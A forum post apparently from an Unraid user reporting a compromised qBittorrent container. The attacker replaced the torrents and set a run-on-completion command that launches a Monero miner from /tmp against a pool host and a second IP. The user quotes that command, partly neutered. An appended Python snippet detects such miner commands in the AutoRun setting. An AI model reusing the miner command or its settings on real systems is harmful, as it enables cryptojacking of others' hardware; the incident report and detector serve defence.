Docker container compromised - Unraid affected?


brainyyak


Attachment: tower-diagnostics-20210830-1839.zip

I was away from home last night, and when I came back from work today, I noticed that my CPU was nearly maxed out. This was odd, but does happen sometimes. However, I went into my torrent client (qbittorrent) and found that all of my torrents had been deleted and had been replaced with a single torrent for some kind of Italian music.

(image: qbt1.png)


It should go without saying that I have never heard of this music nor did I seek it out. I went into my logs for qbt, and found the following:

(images: qbt1.png, qbt2.png)


I have no idea what those ports I circled are; I have never used them to my knowledge. I also found in my settings that some code was marked to be executed upon completion of the torrent:

/tmp/x -o pool.suppo[CODE NEUTER]rtxmr.com:443 -u 8C2GLAN7wPEDE7xAiCLYBwdPtjc3B5pWH[CODE NEUTER]44989qMTmwSjbKmm2Y1Zog9UJWchsnrkjF4qkr7CbCtUAS4QGWyxhRW7Vfg5RZ -k --tls -o 107.173.34.104:9090

The [CODE NEUTER]s were added by me to prevent any accidental activation.


Furthermore, the logs Unraid gives me for qbt show this:

(image: qbt3.png)


All in all, I take this to mean that someone hijacked my system to run some kind of mining software. I can see in the logs here that the line of code to be run on completion was changed a few times; I assume this was the hacker setting up their system.


I've already done what I can to stop any further access and stop any illicit activity, but I'm worried about making sure there isn't any lasting damage or compromise. I am not very well versed with this stuff, so I would appreciate any suggestions.


I have attached my diag file.

https://forums.unraid.net/applications/core/interface/file/attachment.php?id=125259&key=7d5b734ea2581f6305efd6e1c07edb66

Edited by brainyyak
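An added check, not part of brainyyak's post, for the mechanism described above: qBittorrent keeps its run-on-completion command under the [AutoRun] section of qBittorrent.conf, so auditing that key is one way to confirm the setting has actually been cleaned after an incident like this. The config text, pool hostname and wallet string below are constructed placeholders modelled on the post, not real indicators.

```python
import configparser
import io
import re

# Constructed sample of a qBittorrent.conf [AutoRun] section, modelled on the
# hijacked "run on completion" command in the post. Pool and wallet are
# placeholders, not real indicators.
SAMPLE_CONF = """\
[AutoRun]
enabled=true
program=/tmp/x -o pool.EXAMPLE-POOL.invalid:443 -u 4PLACEHOLDERWALLETPLACEHOLDERWALLETPLACEHOLDERWALLET -k --tls -o 203.0.113.10:9090

[Preferences]
WebUI\\Port=8080
"""

# A completion hook that lives in a world-writable scratch directory is a red flag.
SUSPICIOUS_PATH = re.compile(r"^(/tmp|/dev/shm|/var/tmp)/")
# xmrig-style switches: -o host:port, -u <long alphanumeric wallet>, -k, --tls
MINER_ARGS = re.compile(r"(?:^|\s)(-o\s+\S+:\d+|-u\s+[A-Za-z0-9]{40,}|--tls|-k)(?=\s|$)")

def load_autorun(conf_text):
    """Return (enabled, program) from [AutoRun], or (False, '') if absent."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case; other sections use keys like WebUI\Port
    cp.read_file(io.StringIO(conf_text))
    if not cp.has_section("AutoRun"):
        return False, ""
    enabled = cp.get("AutoRun", "enabled", fallback="false").lower() == "true"
    program = cp.get("AutoRun", "program", fallback="")
    return enabled, program

def assess_autorun(program):
    """Return the reasons the configured program looks like a miner hijack."""
    reasons = []
    if not program:
        return reasons
    exe = program.split()[0]
    if SUSPICIOUS_PATH.match(exe):
        reasons.append(f"binary in scratch directory: {exe}")
    hits = MINER_ARGS.findall(program)
    if len(hits) >= 2:  # one switch alone is weak evidence; several together are not
        reasons.append("miner-style arguments: " + ", ".join(hits))
    return reasons

def audit(conf_text):
    """Summarise the AutoRun state of a config file for review."""
    enabled, program = load_autorun(conf_text)
    return {"enabled": enabled, "program": program, "reasons": assess_autorun(program)}

if __name__ == "__main__":
    print(audit(SAMPLE_CONF))
```

Run it against the real qBittorrent.conf inside the container's config share; an empty `reasons` list with `enabled` false is the state to expect after cleanup.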
